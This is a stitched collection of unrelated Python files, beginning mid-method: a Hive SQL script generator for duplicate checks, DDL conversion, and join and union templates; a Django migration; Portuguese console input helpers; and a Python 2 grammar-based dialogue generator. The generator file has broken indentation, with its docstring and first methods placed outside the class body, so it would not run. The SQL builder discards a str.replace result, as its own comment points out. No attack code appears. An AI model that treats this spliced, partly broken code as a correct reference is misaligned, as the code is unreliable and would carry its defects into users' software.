        # NOTE(review): str.replace returns a new string, so this call has no
        # effect as written — presumably meant to reassign sql_statement.
        sql_statement.replace('`','')
        parse = HqlParse(sql_statement)
        insert_info = parse.insert_info
        str_list = ['set hive.mapred.mode=strict;']
        for stmt in insert_info:
            # Skip the main (first) table; inspect each joined sub-table.
            tokens = stmt['sub_tables'][1:]
            idx = 1
            for token in tokens:
                table_alias = token['table']['table_alias']
                res_columns = []
                table_name = token['table']['table_name']
                # print(token['res'][0].split(table_alias)[1])
                for res in token['res']:
                    # Extract the bare column name after the alias prefix.
                    res_column = re.findall(r'\.?(\w+)\s*?', res.split(table_alias)[1], re.S | re.I)[0]
                    res_columns.append(res_column)
                str = '''
SELECT
"{0}",*
FROM (
SELECT
{1}
,COUNT(1) OVER(PARTITION BY {1}) AS ct
FROM {2}
) {0} WHERE {0}.ct > 1;
'''.format(table_alias, ",".join(res_columns), table_name)
                #print(str)
                str_list.append(str)
        return '\n'.join(str_list)

    # Build a basic QA/test-report script for the insert's target table.
    def build_test_sql(self, sql_statement):
        parse = HqlParse(sql_statement)
        insert_info = parse.insert_info[0]
        target_table_name = insert_info['target_table_name']
        main_table_name = insert_info['sub_tables'][0]['table']['table_name']
        sql_list = []
        # Eyeball sample rows for garbled/mojibake characters.
        sql_list.append('SELECT * FROM {0} LIMIT 500;'.format(target_table_name))
        # Compare row counts of target vs. main source table.
        sql_list.append('''SELECT "T1",COUNT(1) FROM {0}
UNION ALL
SELECT "T2",COUNT(1) FROM {1};
'''.format(target_table_name,main_table_name))
        # show table
        sql_list.append('show create table {0};'.format(target_table_name))
        return '\n'.join(sql_list)

    # Convert Hive CREATE TABLE DDL into MySQL DDL.
    def hive2Mysql(self,sql_statement):
        parse = HqlParse(sql_statement)
        tables = parse.tables
        table_str = ''
        for table in tables:
            # Strip the database prefix from "db.table".
            tablename = table['table_name'][table['table_name'].rfind('.') + 1:]
            columns = []
            table_comment = table['table_comment']
            index = 1
            for column in table['definitions']:
                # column name
                column_name = column[0].value
                # column type (STRING mapped to varchar/TEXT by position)
                coumn_type = convert2mysql_type(column[1].value,index)
                index += 1
                # column comment
                comment = column[3].value
                columns.append(my_format(column_name, coumn_type, comment))
            # Drop the leading comma on the first column line.
            columns[0] = columns[0].replace(',','\t')
            table_str += """
CREATE TABLE IF NOT EXISTS {0} (
{1}
)COMMENT '{2}'
;
""".format(tablename,"\n\t".join(columns),table_comment)
        return table_str

    # Join several tables, dropping duplicate column names across tables.
    def column_dumplicate(self, sql_statement,hostname,now):
        parse = HqlParse(sql_statement)
        tables = parse.tables
        columns = {}
        index = 1
        columns_comment = []
        table_dic = {}
        for table in tables:
            tablename = table['table_name']
            tablecomment = table['table_comment']
            alias_columns = []
            for column in table['definitions']:
                # column name
                column_name = column[0].value
                # column type
                coumn_type = column[1].value
                # column comment
                comment = column[3].value
                m_column = my_format(column_name, coumn_type, comment)
                m_column__ = [column_name, my_format2(column_name, coumn_type, comment)]
                columns[column_name] = m_column
                alias_columns.append(m_column__)
            table_dic['t' + str(index)] = {'columns':alias_columns,'tablename':tablename,'tablecomment':tablecomment}
            index += 1
        # De-duplicate column names across the tables.
        # TODO support backtick (`) quoting
        dump_keys = []
        for key in table_dic.keys():
            # Compare each table with the earlier ones; drop its duplicates.
            c1 = table_dic[key]['columns']
            c1_new = []
            if len(dump_keys) == 0:
                for c in c1:
                    c1_new.append(c[0])
                dump_keys = copy.deepcopy(c1_new)
                continue
            for c in c1:
                if c[0] not in dump_keys:
                    c1_new.append([c[0],c[1]])
                    dump_keys.append(c[0])
            table_dic[key]['columns'] = list(c1_new)
        sub_table_str = []
        flag = 0
        for key in table_dic.keys():
            sub_table_columns = []
            # Collect the output column list for this sub-select.
            for co in table_dic[key]['columns']:
                # SELECT
                columns_comment.append(my_format3('{0}.{1}'.format(key,co[1].strip())))
                # columns of the sub-select
                sub_table_columns.append(co[1].strip())
            #print('\n'.join(sub_table_columns),table_dic[key]['tablename'])
            # First table is the FROM clause; the rest become LEFT JOINs.
            if not flag:
                ss = """ (
select
{0}
from {1} -- min_size: comment:{3}
-- where ds = ' '
) {2}
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,table_dic[key]['tablecomment'])
                flag = 1
            else:
                ss = """LEFT JOIN(
select
{0}
from {1} -- min_size: comment: {3}
-- where ds = ' '
) {2}
ON
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,table_dic[key]['tablecomment'])
            sub_table_str.append(ss)
        columns_values = list(columns.values())
        columns_values[0] = columns_values[0].replace(',', '\t')
        columns_str = '\n \t'.join(columns_values)
        columns_comment[0] = '\t' + str(columns_comment[0])
        columns_comment_str = '\n\t,'.join(list(columns_comment))
        final = """----------------------------------------------
-- @ Output:db_name.table_name
-- @ Desc:{5}
-- @ Primary Key:
-- @ Author:{3}
-- @ Create Time:{4}
-- @ Modify Time:({3},{4},创建表)
-- @ Comment:{5}
----------------------------------------------
CREATE TABLE IF NOT EXISTS XXXXX (
{0}
\t,etl_time timestamp COMMENT 'etl_time'
)COMMENT '{5}'
-- 要不要分区?partitioned by (ds string)
ROW FORMAT DELIMITED STORED AS orc TBLPROPERTIES('orc.compression'='SNAPPY')
;
-- 分区检查
set hive.mapred.mode = strict;
insert overwrite table XXXXXX 分区?partition(ds = ' ' )
SELECT
{1}
\t,current_timestamp as etl_time
from
{2}
""".format(columns_str, columns_comment_str, '\n'.join(sub_table_str), hostname, now,table_dic['t1']['tablecomment'])
        final += '\n;'
        return final

    # Like column_dumplicate, but duplicate names are kept and disambiguated
    # with a table-derived prefix instead of being dropped.
    def column_none_dumplicate(self, sql_statement, hostname, now):
        parse = HqlParse(sql_statement)
        tables = parse.tables
        columns = {}
        index = 1
        columns_comment = []
        table_dic = {}
        for table in tables:
            tablename = table['table_name']
            tablecomment = table['table_comment']
            alias_columns = []
            for column in table['definitions']:
                # column name
                column_name = column[0].value
                # column type
                coumn_type = column[1].value
                # column comment
                comment = column[3].value
                m_column = my_format(column_name, coumn_type, comment)
                m_column__ = [column_name, my_format2(column_name, coumn_type, comment),m_column]
                #columns[column_name] = m_column
                alias_columns.append(m_column__)
            table_dic['t' + str(index)] = {'columns': alias_columns, 'tablename': tablename,
                                           'tablecomment': tablecomment}
            index += 1
        # De-duplicate column names across the tables.
        # TODO support backtick (`) quoting
        dump_keys = []
        for key in table_dic.keys():
            # Compare with earlier tables; prefix duplicates rather than drop.
            c1 = table_dic[key]['columns']
            c1_new = []
            c1_columns = []
            if len(dump_keys) == 0:
                for c in c1:
                    c1_new.append(c[0])
                    c1_columns.append([c[0],c[1],c[1]])
                    columns[c[0]] = c[2]
                dump_keys = copy.deepcopy(c1_new)
                table_dic[key]['columns'] = list(c1_columns)
                continue
            for c in c1:
                if c[0] not in dump_keys:
                    c1_new.append([c[0],c[1],c[1]])
                    dump_keys.append(c[0])
                    columns[c[0]] = c[2]
                else:
                    # Derive a short prefix from the table name and rename
                    # the clashing column "<prefix>_<name>".
                    tablename = table_dic[key]['tablename'][table_dic[key]['tablename'].rfind('.')+1:]
                    tablename = re.sub(r'\w+_\w+_(\w+)_\w+', r'\1',tablename, flags=re.M | re.I | re.S)
                    new_cname = '{0}_{1}'.format(tablename,c[0])
                    new_cname_all = '{0} as {1}'.format(c[0],str(c[1]).replace(c[0],new_cname))
                    c1_new.append([new_cname,new_cname_all,c[1]])
                    dump_keys.append(new_cname)
                    columns[new_cname] = c[2].replace(c[0],new_cname)
            table_dic[key]['columns'] = list(c1_new)
        sub_table_str = []
        flag = 0
        for key in table_dic.keys():
            sub_table_columns = []
            # Collect the output column list for this sub-select.
            for co in table_dic[key]['columns']:
                # SELECT
                columns_comment.append(my_format3('{0}.{1}'.format(key, co[1].strip())))
                # columns of the sub-select
                sub_table_columns.append(co[2].strip())
            # print('\n'.join(sub_table_columns),table_dic[key]['tablename'])
            # First table is the FROM clause; the rest become LEFT JOINs.
            if not flag:
                ss = """ (
select
{0}
from {1} -- min_size: comment:{3}
-- where ds = ' '
) {2}
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
           table_dic[key]['tablecomment'])
                flag = 1
            else:
                ss = """LEFT JOIN(
select
{0}
from {1} -- min_size: comment: {3}
-- where ds = ' '
) {2}
ON
""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
           table_dic[key]['tablecomment'])
            sub_table_str.append(ss)
        columns_values = list(columns.values())
        columns_values[0] = columns_values[0].replace(',', '\t')
        columns_str = '\n \t'.join(columns_values)
        columns_comment[0] = '\t' + str(columns_comment[0])
        columns_comment_str = '\n\t,'.join(list(columns_comment))
        final = """----------------------------------------------
-- @ Output:db_name.table_name
-- @ Desc:{5}
-- @ Primary Key:
-- @ Author:{3}
-- @ Create Time:{4}
-- @ Modify Time:({3},{4},创建表)
-- @ Comment:{5}
----------------------------------------------
CREATE TABLE IF NOT EXISTS XXXXX (
{0}
\t,etl_time timestamp COMMENT 'etl_time'
)COMMENT '{5}'
-- 要不要分区?partitioned by (ds string)
ROW FORMAT DELIMITED STORED AS orc TBLPROPERTIES('orc.compression'='SNAPPY')
;
-- 分区检查
set hive.mapred.mode = strict;
insert overwrite table XXXXXX 分区?partition(ds = ' ' )
SELECT
{1}
\t,current_timestamp as etl_time
from
{2}
""".format(columns_str, columns_comment_str, '\n'.join(sub_table_str), hostname, now,
           table_dic['t1']['tablecomment'])
        final += '\n;'
        return final

    # Batch-generate SELECT statements, one per parsed table, using the
    # caller-supplied `query` template for each column.
    def select_generate(self,sql_statement,query):
        parse = HqlParse(sql_statement)
        tables = parse.tables
        columns_comment = []
        table_str = ''
        for table in tables:
            tablename = table['table_name']
            tablecomment = table['table_comment']
            columns = []
            for column in table['definitions']:
                # column name
                column_name = column[0].value
                # column type
                coumn_type = column[1].value
                # column comment
                comment = column[3].value
                columns.append(query.format(column_name))
            #columns[0] = columns[0][columns[0].find(',')+1:]
            # If the table is partitioned, filter on yesterday's partition.
            partition = parse.get_partition_col(sql_statement)
            if partition:
                today = datetime.datetime.now()
                yesterday = today - datetime.timedelta(days=1)
                yesterday = yesterday.strftime('%Y%m%d')
                table_str += "SELECT {0} \n FROM {1} \n WHERE {2} = \'{3}\';\n".format('\n,'.join(columns), tablename,partition,yesterday)
            else:
                table_str += "SELECT {0} FROM {1};\n".format('\n,'.join(columns),tablename)
        return table_str

    # Combine several tables with UNION ALL, padding missing columns as NULL.
    def table_union(self, sql_statement, hostname, now):
        sql_statement = sql_statement.replace('`', '')
        sql_statement = sql_statement.replace('"', '')
        parse = HqlParse(sql_statement)
        tables = parse.tables
        columns = {}
        index = 1
        columns_comment = []
        table_dic = {}
        for table in tables:
            tablename = table['table_name']
            tablecomment = table['table_comment']
            alias_columns = []
            for column in table['definitions']:
                # column name
                column_name = column[0].value
                # column type
                coumn_type = column[1].value
                # column comment
                comment = column[3].value
                m_column = my_format(column_name, coumn_type, comment)
                m_column__ = [column_name, my_format2(column_name, coumn_type, comment)]
                columns[column_name] = m_column
                alias_columns.append(m_column__)
            table_dic['t' + str(index)] = {'columns': alias_columns, 'tablename': tablename,
                                           'tablecomment': tablecomment}
            index += 1
        # De-duplicate column names to form the union's output schema.
        # TODO support backtick (`) quoting
        dump_keys = []
        for key in table_dic.keys():
            # Compare each table with the earlier ones; keep first occurrence.
            c1 = table_dic[key]['columns']
            c1_new = []
            if len(dump_keys) == 0:
                for c in c1:
                    c1_new.append(c[0])
                dump_keys = copy.deepcopy(c1_new)
                continue
            for c in c1:
                if c[0] not in dump_keys:
                    c1_new.append([c[0], c[1]])
                    dump_keys.append(c[0])
            # table_dic[key]['columns'] = list(c1_new)
        #print(dump_keys)
        sub_table_str = []
        flag = 0
        for key in table_dic.keys():
            sub_table_columns = []
            table_columns_key = []
            for co in table_dic[key]['columns']:
                # SELECT
                columns_comment.append(co[1].strip())
                # bare column names present in this table
                table_columns_key.append(co[0].strip())
            # Pad columns this table lacks with NULL so UNION branches align.
            for column in dump_keys:
                if column not in table_columns_key:
                    sub_table_columns.append("NULL AS {0}".format(column))
                else:
                    sub_table_columns.append(column)
            if not flag:
                ss = """
select
{0}
\t,current_timestamp as etl_time
from {1} -- min_size: comment:{3}
where ds = '{4}'""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
                           table_dic[key]['tablecomment'],'${bdp.system.bizdate}')
                flag = 1
            else:
                ss = """
UNION ALL
select
{0}
\t,current_timestamp as etl_time
from {1} -- min_size: comment: {3}
where ds = '{4}'""".format('\n\t\t ,'.join(sub_table_columns), table_dic[key]['tablename'], key,
                           table_dic[key]['tablecomment'],'${bdp.system.bizdate}')
            sub_table_str.append(ss)
        columns_values = list(columns.values())
        columns_values[0] = columns_values[0].replace(',', '\t')
        columns_str = '\n \t'.join(columns_values)
        columns_comment[0] = '\t' + str(columns_comment[0])
        columns_comment_str = '\n\t,'.join(list(columns_comment))
        final = """----------------------------------------------
-- @ Output:db_name.table_name
-- @ Desc:{5}
-- @ Primary Key:
-- @ Author:{3}
-- @ Create Time:{4}
-- @ Modify Time:({3},{4},创建表)
-- @ Comment:{5}
----------------------------------------------
CREATE TABLE IF NOT EXISTS XXXXX (
{0}
\t,etl_time timestamp COMMENT 'etl_time'
)COMMENT '{5}'
partitioned by (ds string)
ROW FORMAT DELIMITED STORED AS orc TBLPROPERTIES('orc.compression'='SNAPPY')
;
-- 分区检查
set hive.mapred.mode = strict;
insert overwrite table XXXXXX partition(ds = '{6}')
{2}
""".format(columns_str, columns_comment_str, '\n'.join(sub_table_str), hostname, now,
           table_dic['t1']['tablecomment'],'${bdp.system.bizdate}')
        final += '\n;'
        return final
# Demo input: two Hive ODS CREATE TABLE statements to exercise SQLBuilder.
SQL = """create external table hive_ods.ods_order_info (
id string COMMENT '订单号',
final_total_amount decimal(10,2) COMMENT '订单金额',
order_status string COMMENT '订单状态',
user_id string COMMENT '用户 id',
out_trade_no string COMMENT '支付流水号',
create_time string COMMENT '创建时间',
operate_time string COMMENT '操作时间',
province_id string COMMENT '省份 ID',
benefit_reduce_amount decimal(10,2) COMMENT '优惠金额',
original_total_amount decimal(10,2) COMMENT '原价金额',
feight_fee decimal(10,2) COMMENT '运费'
) COMMENT '订单表'
PARTITIONED BY (dt string)
;
create external table hive_ods.ods_order_detail(
id string COMMENT '订单编号',
order_id string COMMENT '订单号',
user_id string COMMENT '用户 id',
sku_id string COMMENT '商品 id',
sku_name string COMMENT '商品名称',
order_price decimal(10,2) COMMENT '商品价格',
sku_num bigint COMMENT '商品数量',
create_time string COMMENT '创建时间'
) COMMENT '订单详情表'
PARTITIONED BY (dt string);
"""
sql_builder = SQLBuilder(SQL)
# Print the generated UNION ALL script for the two demo tables.
print(sql_builder.table_union(SQL,hostname='gw11',now='20210605'))
|
# Generated by Django 3.1.7 on 2021-04-05 20:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: retargets TouristAttraction.address as a nullable
    CASCADE foreign key to address.addres."""

    dependencies = [
        ('address', '0005_auto_20210405_1717'),
        ('core', '0004_auto_20210405_1706'),
    ]

    operations = [
        migrations.AlterField(
            model_name='touristattraction',
            name='address',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='address.addres'),
        ),
    ]
|
def leiaInt(msg):
    """Keep prompting with `msg` until the user types a valid integer.

    Returns 0 if the user aborts with Ctrl-C.
    """
    while True:
        try:
            return int(input(msg))
        except (ValueError, TypeError):
            print('ERRO: por favor, digite um número do menu.')
        except KeyboardInterrupt:
            print('Usuário preferiu não digitar esse número.')
            return 0
def leiaReal(msg):
    """Keep prompting with `msg` until the user types a valid real number.

    Returns 0 if the user aborts with Ctrl-C.
    """
    while True:
        try:
            return float(input(msg))
        except (ValueError, TypeError):
            print('ERRO: por favor, digite um número real válido')
        except KeyboardInterrupt:
            print('Usuário preferiu não digitar esse número.')
            return 0
# Quick manual exercise of the two validated-input helpers.
i = leiaInt('Digite um número: ')
r = leiaReal('Digite um número: ')
print(f'Você digitou o número inteiro {i} e o número real {r}')
import json
import random
class Productionist(object):
"""A production system for in-game natural language generation from an Expressionist grammar.
Objects of this class operate over a probabilistic context-free generative grammar exported by
Expressionist according to requests originating from a game system. As such, it can be thought of
as an interface between the game engine and an Expressionist grammar.
Subclasses inherit the base functionality of this class, but instantiate their own nuances
pertaining to the specific generation tasks that they carry out (e.g., dialogue generation
vs. thought generation). Most often, these concerns will bear out in the specific mark-up
including in the Expressionist grammars that they operate over.
"""
def __init__(self, game, debug=False):
    """Initialize a Productionist object.

    Loads the Expressionist-exported JSON grammar (dialogue or thought
    variant, chosen by the concrete subclass), resolves symbol references
    in rule bodies, and attributes chaining rules to symbols.
    """
    self.game = game
    self.debug = debug
    # The concrete subclass determines which grammar file to operate over.
    if self.__class__ is DialogueGenerator:
        path_to_json_grammar_specification = game.config.path_to_dialogue_nlg_json_grammar_specification
    else:
        path_to_json_grammar_specification = game.config.path_to_thought_nlg_json_grammar_specification
    self.nonterminal_symbols = self._init_parse_json_grammar_specification(
        path_to_json_grammar_specification=path_to_json_grammar_specification
    )
    self._init_resolve_symbol_references_in_all_production_rule_bodies()
    self._init_attribute_backward_chaining_and_forward_chaining_rules_to_symbols()
    # This method is used to collect all the nonterminal symbols that were expanded
    # in the production of a terminal derivation, which reified LineOfDialogue and
    # Thought objects will need in order to inherit all the mark-up of these symbols
    self.symbols_expanded_to_produce_the_terminal_derivation = set()
def _init_parse_json_grammar_specification(self, path_to_json_grammar_specification):
    """Parse a JSON grammar specification exported by Expressionist to instantiate symbols and rules."""
    # Parse the JSON specification to build a dictionary data structure
    symbol_objects = []
    grammar_dictionary = json.loads(open(path_to_json_grammar_specification).read())
    nonterminal_symbol_specifications = grammar_dictionary['nonterminals']
    # NOTE: dict.iteritems() — this module targets Python 2.
    for tag, nonterminal_symbol_specification in nonterminal_symbol_specifications.iteritems():
        # NOTE(review): the exported 'deep' flag is stored as `top_level` —
        # confirm that 'deep' really denotes a top-level symbol in the export.
        top_level = nonterminal_symbol_specification['deep']
        production_rules_specification = nonterminal_symbol_specification['rules']
        raw_markup = nonterminal_symbol_specification['markup']
        # Dialogue and thought grammars use different symbol classes.
        nonterminal_symbol_class_to_use = (
            DialogueNonterminalSymbol if self.__class__ is DialogueGenerator else ThoughtNonterminalSymbol
        )
        symbol_object = nonterminal_symbol_class_to_use(
            tag=tag, top_level=top_level, raw_markup=raw_markup,
            production_rules_specification=production_rules_specification
        )
        symbol_objects.append(symbol_object)
    return symbol_objects
def _init_resolve_symbol_references_in_all_production_rule_bodies(self):
    """Resolve every production rule's body so symbol references point at symbol objects."""
    all_rules = (
        rule
        for symbol in self.nonterminal_symbols
        for rule in symbol.production_rules
    )
    for production_rule in all_rules:
        self._init_resolve_symbol_references_in_a_rule_body(production_rule=production_rule)
def _init_resolve_symbol_references_in_a_rule_body(self, production_rule):
    """Replace '[[Tag]]' strings in this rule's body with the symbol objects they name."""
    resolved_body = []
    for reference in list(production_rule.body_specification):
        if reference.startswith('[[') and reference.endswith(']]'):
            # Nonterminal reference: strip the delimiters and look the
            # symbol object up by its tag.
            wanted_tag = reference[2:-2]
            resolved_body.append(
                next(s for s in self.nonterminal_symbols if s.tag == wanted_tag)
            )
        else:
            # Terminal symbol: keep the literal string itself.
            resolved_body.append(reference)
    production_rule.body = resolved_body
def _init_attribute_backward_chaining_and_forward_chaining_rules_to_symbols(self):
    """Attribute to symbols their backward-chaining rules and forward-chaining rules.

    A forward-chaining rule of a symbol is a rule whose head (left-hand side)
    is that symbol; a backward-chaining rule is one whose body (right-hand
    side) mentions the symbol.
    """
    # Flatten every production rule in the grammar into one list.
    every_rule = [
        production_rule
        for symbol in self.nonterminal_symbols
        for production_rule in symbol.production_rules
    ]
    for production_rule in every_rule:
        production_rule.head.forward_chaining_rules.append(production_rule)
        for element in production_rule.body:
            if isinstance(element, NonterminalSymbol):
                element.backward_chaining_rules.append(production_rule)
    def target_markup(self, markup_lambda_expression, symbol_sort_evaluation_function, state, rule_evaluation_metric):
        """Attempt to construct a line of dialogue that would perform the given dialogue move.
        This act of dialogue construction is rendered as a search task over the tree specified
        by a grammar authored in Expressionist. Specifically, we target individual symbols that
        are annotated as performing the desired dialogue move, attempting to successfully
        terminally backward-chain (i.e., follow production rules *backward* until we reach a
        top-level symbol) and successfully terminally forward-chain (i.e., follow production
        rules *forward* until we reach an expansion containing no nonterminal symbols). The
        notion of success here is articulated by the Conversation object that calls this method,
        but generally it will constrain this search procedure such that no symbol with
        unsatisfied preconditions (given the state of the conversation/world, which we have
        access to via the Conversation object's attributes) may be expanded at any point.
        Returns the raw derivation (a template string) on success; implicitly returns
        None if no satisficing symbol can be successfully targeted.
        @param markup_lambda_expression: A lambda expression whose sole argument is a nonterminal symbol and
                                         that returns True if the nonterminal symbol has the desired markup.
        @param symbol_sort_evaluation_function: A lambda expression that can be used for the 'key' keyword argument
                                                in the call to sort a list of viable nonterminal symbols (i.e., ones
                                                that have the desired markup). This allows us to iterate over viable
                                                symbols in order of appeal.
        @param state: An object representing the state that symbol preconditions should be checked against in
                      order to potentially expand the given symbol.
        @param rule_evaluation_metric: A lambda expression that determines the probability of application associated
                                       with each of a symbol's production rules; this allows us to probabilistically
                                       target production rules when we're doing forward- and backward-chaining
        """
        # Collect all satisficing symbols, i.e., ones that have the desired markup and
        # thus satisfy the given markup_lambda_expression
        satisficing_symbols = [s for s in self.nonterminal_symbols if markup_lambda_expression(s)]
        # Randomly shuffle these symbols, which will mean that ties in the sort we are about
        # to do will be ordered differently across different generation instances
        random.shuffle(satisficing_symbols)
        # Sort this list according to the given symbol_sort_evaluation_function (for
        # dialogue, this will simply produce a random sort)
        satisficing_symbols.sort(key=lambda ss: symbol_sort_evaluation_function(ss), reverse=True)
        # Iteratively attempt to successfully build a line of dialogue by backward-chaining
        # and forward-chaining from this symbol
        for symbol in satisficing_symbols:
            raw_derivation_built_by_targeting_this_symbol = self._target_symbol(
                symbol=symbol, state=state, rule_evaluation_metric=rule_evaluation_metric, n_tabs=0
            )
            if raw_derivation_built_by_targeting_this_symbol:  # Will be None if targeting was unsuccessful
                return raw_derivation_built_by_targeting_this_symbol
            # This attempt failed: wipe the per-attempt bookkeeping (cached symbol
            # expansions, rule 'viable' flags) so the next candidate starts clean
            self._reset_temporary_attributes()
        if self.debug:
            print "Productionist could not generate a derivation satisfying the expression {}".format(
                markup_lambda_expression
            )
            print "Here's all the satisficing symbols it attempted to begin from, along with their preconditions:"
            for symbol in satisficing_symbols:
                print "\t{}".format(symbol)
                for precondition in symbol.preconditions:
                    print "\t\t{}".format(precondition)
    def _target_symbol(self, symbol, state, rule_evaluation_metric, n_tabs):
        """Attempt to successfully terminally backward-chain and forward-chain from this symbol.
        If successful, this method will return a raw dialogue template (a string) that may
        later be reified as a LineOfDialogue object and deployed during a conversation. If
        this method fails at any point, it will immediately return None.
        @param n_tabs: Indentation depth for debug printouts only.
        """
        if self.debug:
            print "{}Targeting symbol {}...".format(' '*n_tabs, symbol)
        # Attempt forward chaining first
        partial_raw_template_built_by_forward_chaining = self._forward_chain_from_symbol(
            symbol=symbol, state=state, n_tabs=n_tabs, rule_evaluation_metric=rule_evaluation_metric,
            symbol_is_the_targeted_symbol=True
        )
        if not partial_raw_template_built_by_forward_chaining:
            if self.debug:
                print "Could not successfully forward chain from the targeted symbol {}\n*".format(symbol)
            return None
        if self.debug:
            print "Successfully forward chained from targeted symbol {} all the way to terminal expansion '{}'".format(
                symbol, symbol.expansion
            )
        # Forward chaining was successful, so now attempt backward chaining, unless the
        # targeted symbol is a top-level symbol, in which case we can return the template
        # we built by forward-chaining
        if symbol.top_level:
            if self.debug:
                print "Targeted symbol {} is a top-level symbol, so we can skip backward chaining".format(symbol)
            top_level_symbol_that_we_successfully_backward_chained_to = symbol
        else:
            if self.debug:
                print "Now I will attempt to backward chain from the targeted symbol {}".format(symbol)
            top_level_symbol_that_we_successfully_backward_chained_to = self._backward_chain_from_symbol(
                symbol=symbol, state=state, rule_evaluation_metric=rule_evaluation_metric
            )
            if not top_level_symbol_that_we_successfully_backward_chained_to:
                return None
        # Both chains succeeded: replay them from the discovered top-level symbol
        # to assemble the complete template
        complete_raw_template = self._retrace_backward_and_forward_chains_to_generate_a_complete_template(
            start_symbol=top_level_symbol_that_we_successfully_backward_chained_to,
            state=state, rule_evaluation_metric=rule_evaluation_metric
        )
        return complete_raw_template
    def _forward_chain_from_symbol(self, symbol, state, n_tabs, rule_evaluation_metric, retracing_chains=False,
                                   symbol_is_the_targeted_symbol=False):
        """Attempt to successfully terminally forward-chain from the given symbol, i.e.,
        attempt to terminally expand a symbol.
        If successful, this method will return a string constituting a partial dialogue
        template pertaining to the portion of a prospective complete line of dialogue
        that would include everything including and beyond the expansion of the targeted
        symbol. If this method fails at any point, it will immediately return None.
        @param retracing_chains: Whether we are replaying already-discovered chains (in which
                                 case cached expansions are deliberately not reused, so that
                                 traversed symbols are recorded along the way).
        @param symbol_is_the_targeted_symbol: Whether this symbol is the one originally targeted
                                              by target_markup(); used for breadcrumb bookkeeping.
        """
        if self.debug:
            print "{}Attempting to forward chain from symbol {}...".format(' '*n_tabs, symbol)
        # First check for whether this symbol's preconditions are satisfied and whether
        # the use of its expansion in a line of dialogue would cause a conversational
        # violation to be incurred
        if symbol.currently_violated(state=state):
            return None
        candidate_production_rules = symbol.forward_chaining_rules
        # If one of these production rules is already known to be on a chain, we can just pick
        # that one mindlessly, since we already know that's the route to go
        try:
            rule_on_our_chain = next(r for r in candidate_production_rules if r.viable)
            return self._target_production_rule(
                rule=rule_on_our_chain, state=state, rule_evaluation_metric=rule_evaluation_metric,
                n_tabs=n_tabs+1, retracing_chains=retracing_chains
            )
        except StopIteration:
            # No rule on a known chain yet -- fall through to probabilistic selection
            pass
        # Sort the candidate production rules probabilistically by utilizing their application rates
        candidate_production_rules = self._probabilistically_sort_production_rules(
            rules=candidate_production_rules, rule_evaluation_metric=rule_evaluation_metric
        )
        # Iterate over these rules, attempting to utilize them successfully; return
        # a template snippet if a rule may be utilized successfully
        for production_rule in candidate_production_rules:
            terminal_expansion_yielded_by_firing_that_production_rule = self._target_production_rule(
                rule=production_rule, state=state, rule_evaluation_metric=rule_evaluation_metric,
                n_tabs=n_tabs+1, retracing_chains=retracing_chains
            )
            if terminal_expansion_yielded_by_firing_that_production_rule:
                # Save this successful terminal expansion of this symbol, in case we
                # need it later (so that we don't reduplicate this completed effort)
                symbol.expansion = terminal_expansion_yielded_by_firing_that_production_rule
                # If the symbol we're forward chaining from is a top-level symbol and is
                # the symbol that we are ultimately targeting, then save the production rule
                # that allowed us to terminally expand it, since we'll need this information
                # when we go back through the forward chain to collect all the mark-up of
                # the symbols we expanded on the chain (for the LineOfDialogue object we
                # end up instantiating to inherit)
                if symbol.top_level and symbol_is_the_targeted_symbol:
                    if self.debug:
                        print "Added production rule {} to the chain".format(production_rule)
                    production_rule.viable = True
                return terminal_expansion_yielded_by_firing_that_production_rule
        # If we tried every production rule and failed to return a terminal expansion,
        # then we must give up on this symbol by returning None
        if self.debug:
            print "Failed to forward chain from symbol {}".format(symbol)
        return None
    def _backward_chain_from_symbol(self, symbol, state, rule_evaluation_metric):
        """Attempt to successfully terminally backward-chain from the given symbol.
        If successful, this method will return the top-level NonterminalSymbol that we
        chained back to (from which the complete template can later be retraced). If
        this method fails at any point, it will immediately return None.
        """
        if self.debug:
            print "Attempting to backward chain from symbol {}...".format(symbol)
        if symbol.top_level:
            # Make sure this symbol doesn't violate any preconditions, since this hasn't
            # been checked yet during backward chaining
            if not symbol.currently_violated(state=state):
                if self.debug:
                    print "Reached top-level symbol {}, so backward chaining is done".format(symbol)
                return symbol
        # Not (usably) top-level: try each rule whose body contains this symbol
        candidate_production_rules = symbol.backward_chaining_rules
        # Sort the candidate production rules probabilistically by utilizing their application rates
        candidate_production_rules = self._probabilistically_sort_production_rules(
            rules=candidate_production_rules, rule_evaluation_metric=rule_evaluation_metric
        )
        for production_rule in candidate_production_rules:
            this_production_rule_successfully_fired = (
                self._target_production_rule(
                    rule=production_rule, state=state, rule_evaluation_metric=rule_evaluation_metric,
                    n_tabs=0
                )
            )
            if this_production_rule_successfully_fired:
                production_rule.viable = True
                # Set breadcrumbs so that we can reconstruct our path if this backward chain
                # is successful (by 'reconstruct our path', I mean fire all the production rules
                # along our successful backward chain until we've generated a complete dialogue template)
                top_level_symbol_we_successfully_chained_back_to = (
                    self._backward_chain_from_symbol(
                        production_rule.head, state=state, rule_evaluation_metric=rule_evaluation_metric
                    )
                )
                if top_level_symbol_we_successfully_chained_back_to:
                    if self.debug:
                        print "Added production rule {} to the chain".format(production_rule)
                    return top_level_symbol_we_successfully_chained_back_to
        if self.debug:
            print "Failed to backward chain from symbol {}".format(symbol)
        return None
    def _retrace_backward_and_forward_chains_to_generate_a_complete_template(self, start_symbol, state,
                                                                             rule_evaluation_metric):
        """Retrace successfully terminal backward and forward chains to generate a complete dialogue template.
        In this method, we traverse the production-rule chains that we have already successfully
        discovered (rules marked 'viable') to generate a complete line of dialogue (and to
        accumulate all the mark-up that it will inherit from the symbols that are expanded
        along these chains).
        @param start_symbol: The top-level symbol from which the retraced derivation begins.
        """
        # Record every symbol traversed during the retrace; LineOfDialogue inherits markup from these
        self.symbols_expanded_to_produce_the_terminal_derivation = {start_symbol}
        if self.debug:
            print "Retraversing now from top-level symbol {}".format(start_symbol)
        # The 'viable' flag marks the rule that was fired on our successful chain
        first_breadcrumb = next(rule for rule in start_symbol.production_rules if rule.viable)
        return self._target_production_rule(
            rule=first_breadcrumb, state=state, retracing_chains=True, rule_evaluation_metric=rule_evaluation_metric,
            n_tabs=0
        )
